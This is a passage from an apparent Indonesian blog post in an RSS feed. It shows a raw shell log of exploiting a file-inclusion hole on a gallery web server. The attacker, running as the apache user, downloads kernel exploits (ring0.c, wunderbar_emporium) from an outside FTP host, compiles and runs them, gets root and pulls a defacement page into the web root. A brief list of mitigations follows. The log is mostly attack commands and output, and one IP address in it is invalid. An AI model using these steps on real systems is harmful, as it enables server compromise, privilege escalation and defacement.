-rw-rw-rw-   1 45234    uname        4987 Jul  5 17:34 _template_component_header.php<br />
-rw-rw-rw-   1 45234    uname        4787 Jul  5 07:15 _template_component_image.php<br />
-rw-rw-rw-   1 45234    uname         189 Apr 11 00:16 _template_component_login.php<br />
-rw-rw-rw-   1 45234    uname        2436 Jul 22 14:12 _template_component_sitemap.php<br />
-rw-rw-rw-   1 45234    uname        5513 Jun  3 07:26 _template_parser.php<br />
-rw-rw-rw-   1 45234    uname        4094 Jul  5 17:34 common.js<br />
-rw-rw-rw-   1 45234    uname        6769 Jul 22 14:12 common.php<br />
-rw-rw-rw-   1 45234    uname        2424 Apr 11 05:49 id.php<br />
-rw-rw-rw-   1 45234    uname       10350 Jul 17 05:17 mod_gallery.js<br />
-rw-rw-rw-   1 45234    uname        7783 Jul  7 06:04 mod_gallery.php<br />
-rw-rw-rw-   1 45234    uname       15286 Jul 11 03:39 mod_gallery_funcs.php<br />
-rw-rw-rw-   1 45234    uname        9051 Jul 14 04:15 mod_image.js<br />
-rw-rw-rw-   1 45234    uname        6751 Apr 11 22:08 mod_image.php<br />
-rw-rw-rw-   1 45234    uname        9878 Jul  8 05:04 mod_image_funcs.php<br />
-rw-rw-rw-   1 45234    uname        4337 Apr 11 22:08 mod_tag.php<br />
-rw-rw-rw-   1 45234    uname        4239 Apr 11 05:49 mod_tag_funcs.php<br />
-rw-rw-rw-   1 45234    uname         829 Apr 11 22:08 mod_tag_view.php<br />
-rw-rw-rw-   1 45234    uname       17389 Jul 14 04:15 mod_taglist.js<br />
-rw-rw-rw-   1 45234    uname       14331 Jul  8 05:42 mod_upgrade.js<br />
-rw-rw-rw-   1 45234    uname        4228 Jul  8 05:04 mod_upgrade.php<br />
-rw-rw-rw-   1 45234    uname        2785 Jul 12 23:41 mod_upgrade_funcs.php<br />
-rw-rw-rw-   1 45234    uname        7290 Apr 11 22:08 mod_user.php<br />
-rw-rw-rw-   1 45234    uname        5689 Apr 11 22:08 mod_user_funcs.php<br />
-rw-rw-rw-   1 45234    uname         340 Apr 11 22:08 mod_user_view.php<br />
-rw-rw-rw-   1 45234    uname       13852 Jul  6 01:02 mod_userlist.js<br />
-rw-rw-rw-   1 45234    uname         554 Jul 14 05:30 page_admin.php<br />
-rw-rw-rw-   1 45234    uname         649 Jul 14 05:30 page_admin_maintain.php<br />
-rw-rw-rw-   1 45234    uname        3700 Jul 14 05:30 page_admin_maintain_image.php<br />
-rw-rw-rw-   1 45234    uname         637 Jul 14 05:30 page_admin_orphans.php<br />
-rw-rw-rw-   1 45234    uname        1755 Jul 14 05:30 page_admin_tags.php<br />
-rw-rw-rw-   1 45234    uname        1816 Jul 14 05:30 page_admin_users.php<br />
-rw-rw-rw-   1 45234    uname        2433 Jul  5 07:15 page_gallery_add.php<br />
-rw-rw-rw-   1 45234    uname        2978 Jul 17 05:17 page_gallery_view.php<br />
-rw-rw-rw-   1 45234    uname        1697 Jul  5 07:15 page_image_add.php<br />
-rw-rw-rw-   1 45234    uname        2529 Jun  7 21:46 page_image_view.php<br />
-rw-rw-rw-   1 45234    uname         736 Jul  5 07:15 page_image_view_full.php<br />
-rw-rw-rw-   1 45234    uname         830 Jul  5 07:15 page_login.php<br />
-rw-rw-rw-   1 45234    uname         391 Jul  5 07:15 page_main_view.php<br />
-rw-rw-rw-   1 45234    uname         353 Jul  5 07:15 page_sitemap.php<br />
-rw-rw-rw-   1 45234    uname         887 Jul  5 07:15 page_upgrade.php<br />
-rw-rw-rw-   1 45234    uname        1587 Jan 30  2009 pngfix.js<br />
<strong>id</strong><br />
uid=80(apache) gid=80(apache) groups=80(apache)<br />
<strong>wget ftp://uname.site88.net/ring0.c</strong><br />
--2009-09-21 03:00:15--  ftp://292.138.16.109/ring0.c<br />
=&gt; `ring0.c'<br />
Connecting to 292.138.16.109:21... connected.<br />
Logging in as anonymous ... Logged in!<br />
==&gt; SYST ... done.    ==&gt; PWD ... done.<br />
==&gt; TYPE I ... done.  ==&gt; CWD not needed.<br />
==&gt; SIZE ring0.c ... 4290<br />
==&gt; PASV ... done.    ==&gt; RETR ring0.c ... done.<br />
Length: 4290 (4.2K)</code></p>
<p>0K ….                                                  100%  153M=0s</p>
<p>2009-09-21 03:00:16 (153 MB/s) – `ring0.c’ saved [4290]</p>
<p><strong>ls</strong><br />
OverLib<br />
_db_funcs.php<br />
_error_funcs.php<br />
_error_funcs.php~<br />
_header.php<br />
_html_head.php<br />
_image_scaler.php<br />
_integrity_funcs.php<br />
_login.php<br />
_logout.php<br />
_request.js<br />
_template_component_admin.php<br />
_template_component_footer.php<br />
_template_component_gallery.php<br />
_template_component_generic.php<br />
_template_component_header.php<br />
_template_component_image.php<br />
_template_component_login.php<br />
_template_component_sitemap.php<br />
_template_parser.php<br />
common.js<br />
common.php<br />
id.php<br />
mod_gallery.js<br />
mod_gallery.php<br />
mod_gallery_funcs.php<br />
mod_image.js<br />
mod_image.php<br />
mod_image_funcs.php<br />
mod_tag.php<br />
mod_tag_funcs.php<br />
mod_tag_view.php<br />
mod_taglist.js<br />
mod_upgrade.js<br />
mod_upgrade.php<br />
mod_upgrade_funcs.php<br />
mod_user.php<br />
mod_user_funcs.php<br />
mod_user_view.php<br />
mod_userlist.js<br />
page_admin.php<br />
page_admin_maintain.php<br />
page_admin_maintain_image.php<br />
page_admin_orphans.php<br />
page_admin_tags.php<br />
page_admin_users.php<br />
page_gallery_add.php<br />
page_gallery_view.php<br />
page_image_add.php<br />
page_image_view.php<br />
page_image_view_full.php<br />
page_login.php<br />
page_main_view.php<br />
page_sitemap.php<br />
page_upgrade.php<br />
pngfix.js<br />
ring0.c<br />
<strong>gcc ring0.c -o ring0</strong><br />
<strong>pwd</strong><br />
/var/www/htdocs/gallery/sources<br />
<strong>./ring0</strong><br />
bash: line 8:  6030 Segmentation fault      ./ring0<br />
<strong>./ring0</strong><br />
bash: line 9:  6102 Segmentation fault      ./ring0<br />
<strong>id</strong><br />
uid=80(apache) gid=80(apache) groups=80(apache)<br />
<strong>./ring0</strong><br />
bash: line 11:  6130 Segmentation fault      ./ring0<br />
<strong>./ring0</strong><br />
bash: line 12:  6160 Segmentation fault      ./ring0<br />
<strong>id</strong><br />
uid=80(apache) gid=80(apache) groups=80(apache)<br />
<strong>wget ftp://uname.site88.net/wonderbar_emporium.tgz</strong><br />
–2009-09-21 03:03:24–  ftp://292.138.16.109/wonderbar_emporium.tgz<br />
=&gt; `wonderbar_emporium.tgz’<br />
Connecting to 292.138.16.109:21… connected.<br />
Logging in as anonymous … Logged in!<br />
==&gt; SYST … done.    ==&gt; PWD … done.<br />
==&gt; TYPE I … done.  ==&gt; CWD not needed.<br />
==&gt; SIZE wonderbar_emporium.tgz … done.<br />
==&gt; PASV … done.    ==&gt; RETR wonderbar_emporium.tgz …<br />
No such file `wonderbar_emporium.tgz’.</p>
<p><strong>wget ftp://uname.site88.net/wunderbar_emporium.tgz</strong><br />
–2009-09-21 03:03:55–  ftp://uname.site88.net/wunderbar_emporium.tgz<br />
=&gt; `wunderbar_emporium.tgz’<br />
Connecting to 292.138.16.109:21… connected.<br />
Logging in as anonymous … Logged in!<br />
==&gt; SYST … done.    ==&gt; PWD … done.<br />
==&gt; TYPE I … done.  ==&gt; CWD not needed.<br />
==&gt; SIZE wunderbar_emporium.tgz … 3491991<br />
==&gt; PASV … done.    ==&gt; RETR wunderbar_emporium.tgz … done.<br />
Length: 3491991 (3.3M)</p>
<p>0K ………. ………. ………. ………. ……….  1% 53.9M 0s<br />
50K ………. ………. ………. ………. ……….  2% 75.4M 0s<br />
100K ………. ………. ………. ………. ……….  4% 86.7M 0s<br />
150K ………. ………. ………. ………. ……….  5% 1.63M 1s<br />
200K ………. ………. ………. ………. ……….  7%  181M 0s<br />
250K ………. ………. ………. ………. ……….  8%  203M 0s<br />
300K ………. ………. ………. ………. ………. 10%  206M 0s<br />
350K ………. ………. ………. ………. ………. 11%  125M 0s<br />
400K ………. ………. ………. ………. ………. 13% 97.0M 0s<br />
450K ………. ………. ………. ………. ………. 14%  205M 0s<br />
500K ………. ………. ………. ………. ………. 16%  213M 0s<br />
550K ………. ………. ………. ………. ………. 17%  143M 0s<br />
600K ………. ………. ………. ………. ………. 19%  117M 0s<br />
650K ………. ………. ………. ………. ………. 20%  209M 0s<br />
700K ………. ………. ………. ………. ………. 21%  210M 0s<br />
750K ………. ………. ………. ………. ………. 23%  211M 0s<br />
800K ………. ………. ………. ………. ………. 24%  111M 0s<br />
850K ………. ………. ………. ………. ………. 26%  159M 0s<br />
900K ………. ………. ………. ………. ………. 27%  139M 0s<br />
950K ………. ………. ………. ………. ………. 29% 73.1M 0s<br />
1000K ………. ………. ………. ………. ………. 30%  120M 0s<br />
1050K ………. ………. ………. ………. ………. 32%  122M 0s<br />
1100K ………. ………. ………. ………. ………. 33%  124M 0s<br />
1150K ………. ………. ………. ………. ………. 35%  129M 0s<br />
1200K ………. ………. ………. ………. ………. 36%  159M 0s<br />
1250K ………. ………. ………. ………. ………. 38%  211M 0s<br />
1300K ………. ………. ………. ………. ………. 39%  215M 0s<br />
1350K ………. ………. ………. ………. ………. 41%  159M 0s<br />
1400K ………. ………. ………. ………. ………. 42% 45.4M 0s<br />
1450K ………. ………. ………. ………. ………. 43%  149M 0s<br />
1500K ………. ………. ………. ………. ………. 45%  137M 0s<br />
1550K ………. ………. ………. ………. ………. 46%  163M 0s<br />
1600K ………. ………. ………. ………. ………. 48%  114M 0s<br />
1650K ………. ………. ………. ………. ………. 49%  140M 0s<br />
1700K ………. ………. ………. ………. ………. 51%  158M 0s<br />
1750K ………. ………. ………. ………. ………. 52%  140M 0s<br />
1800K ………. ………. ………. ………. ………. 54%  120M 0s<br />
1850K ………. ………. ………. ………. ………. 55%  138M 0s<br />
1900K ………. ………. ………. ………. ………. 57%  159M 0s<br />
1950K ………. ………. ………. ………. ………. 58%  138M 0s<br />
2000K ………. ………. ………. ………. ………. 60%  114M 0s<br />
2050K ………. ………. ………. ………. ………. 61%  160M 0s<br />
2100K ………. ………. ………. ………. ………. 63%  141M 0s<br />
2150K ………. ………. ………. ………. ………. 64%  159M 0s<br />
2200K ………. ………. ………. ………. ………. 65% 49.9M 0s<br />
2250K ………. ………. ………. ………. ………. 67%  148M 0s<br />
2300K ………. ………. ………. ………. ………. 68%  137M 0s<br />
2350K ………. ………. ………. ………. ………. 70%  160M 0s<br />
2400K ………. ………. ………. ………. ………. 71%  113M 0s<br />
2450K ………. ………. ………. ………. ………. 73%  135M 0s<br />
2500K ………. ………. ………. ………. ………. 74%  163M 0s<br />
2550K ………. ………. ………. ………. ………. 76%  138M 0s<br />
2600K ………. ………. ………. ………. ………. 77%  157M 0s<br />
2650K ………. ………. ………. ………. ………. 79%  141M 0s<br />
2700K ………. ………. ………. ………. ………. 80% 47.1M 0s<br />
2750K ………. ………. ………. ………. ………. 82%  137M 0s<br />
2800K ………. ………. ………. ………. ………. 83%  114M 0s<br />
2850K ………. ………. ………. ………. ………. 85%  158M 0s<br />
2900K ………. ………. ………. ………. ………. 86%  140M 0s<br />
2950K ………. ………. ………. ………. ………. 87%  161M 0s<br />
3000K ………. ………. ………. ………. ………. 89%  141M 0s<br />
3050K ………. ………. ………. ………. ………. 90%  157M 0s<br />
3100K ………. ………. ………. ………. ………. 92%  141M 0s<br />
3150K ………. ………. ………. ………. ………. 93%  162M 0s<br />
3200K ………. ………. ………. ………. ………. 95%  114M 0s<br />
3250K ………. ………. ………. ………. ………. 96%  141M 0s<br />
3300K ………. ………. ………. ………. ………. 98%  159M 0s<br />
3350K ………. ………. ………. ………. ………. 99%  144M 0s<br />
3400K ……….                                            100% 62.8M=0.06s</p>
<p>2009-09-21 03:03:55 (59.3 MB/s) – `wunderbar_emporium.tgz’ saved [3491991]</p>
<p><strong>tar xvzf wunderbar_emporium.tgz</strong><br />
wunderbar_emporium/<br />
wunderbar_emporium/pwnkernel.c<br />
wunderbar_emporium/tzameti.avi<br />
wunderbar_emporium/wunderbar_emporium.sh<br />
wunderbar_emporium/exploit.c<br />
<strong>cd wunderbar_emporium</strong><br />
<strong>pwd</strong><br />
/var/www/htdocs/gallery/sources/wunderbar_emporium<br />
<strong>id</strong><br />
uid=80(apache) gid=80(apache) groups=80(apache)<br />
<strong>./wunderbar_emporium.sh</strong><br />
sh: mplayer: command not found<br />
sh: no job control in this shell<br />
sh-3.1# <strong>id</strong><br />
uid=0(root) gid=0(root) groups=80(apache)<br />
sh-3.1# <strong>pwd</strong><br />
/var/www/htdocs/gallery/sources/wunderbar_emporium<br />
sh-3.1# <strong>cd ../../../../</strong><br />
sh-3.1# <strong>pwd</strong><br />
/var/www/htdocs<br />
sh-3.1# <strong>wget 292.138.16.109/owning.htm</strong>l<br />
–2009-09-21 03:08:52–  http://292.138.16.109/owning.html<br />
Connecting to 292.138.16.109:80… connected.<br />
HTTP request sent, awaiting response… 200 OK<br />
Length: 242 [text/html]<br />
Saving to: `owning.html’</p>
<p>0K                                                       100% 27.0M=0s</p>
<p>2009-09-21 03:08:52 (27.0 MB/s) – `owning.html’ saved [242/242]</p>
<p>sh-3.1#</p>
<p><a href="http://logsmylife.files.wordpress.com/2009/09/lfi6.jpg"><img title="deface" src="http://logsmylife.files.wordpress.com/2009/09/lfi6.jpg?w=300&#038;h=225&#038;h=225" alt="deface" width="300" height="225" /></a></p>
<p><strong>SOLUSI :</strong></p>
<p>1. Gunakan Input Validation yang baik</p>
<p>2. Setting di PHP.INI<br />
– Matikan error_log pada PHP<br />
– Disable Fungsi passthru, exec dan system pada php<br />
– allow_url_fopen = Off<br />
– Safe_mode = On</p>
<p>3. Update Kernel</p>
<p>4. Matikan Komputer Anda, dan kubur dalam-dalam..</p>
<p>5. Update Otak anda,,</p>
<p>Resource: http://logsmylife.wordpress.com/2009/09/22/remote-dan-local-file-inclusion-vulnerability/</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/br0m0c0ra.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/br0m0c0ra.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/br0m0c0ra.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/br0m0c0ra.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/br0m0c0ra.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/br0m0c0ra.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/br0m0c0ra.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/br0m0c0ra.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/br0m0c0ra.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/br0m0c0ra.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/br0m0c0ra.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/br0m0c0ra.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/br0m0c0ra.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/br0m0c0ra.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=3&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://br0m0c0ra.wordpress.com/2009/10/06/remote-dan-local-file-inclusion-vulnerability/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d4a2b2e16febdad3d0b6b636fe2f2cb2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">br0m0c0ra</media:title>
		</media:content>

		<media:content url="http://logsmylife.files.wordpress.com/2009/09/lfi.jpg?w=300&#38;h=225" medium="image">
			<media:title type="html">local file inclusion 1</media:title>
		</media:content>

		<media:content url="http://logsmylife.files.wordpress.com/2009/09/lfi2.jpg?w=300&#38;h=225" medium="image">
			<media:title type="html">local file inclusion 2</media:title>
		</media:content>

		<media:content url="http://logsmylife.files.wordpress.com/2009/09/lfi5.jpg?w=300&#38;h=226" medium="image">
			<media:title type="html">LFI5</media:title>
		</media:content>

		<media:content url="http://logsmylife.files.wordpress.com/2009/09/lfi4.jpg?w=300&#38;h=225" medium="image">
			<media:title type="html">local file inclusion</media:title>
		</media:content>

		<media:content url="http://logsmylife.files.wordpress.com/2009/09/lfi6.jpg?w=300&#38;h=225" medium="image">
			<media:title type="html">deface</media:title>
		</media:content>
	</item>
	</channel>
</rss>
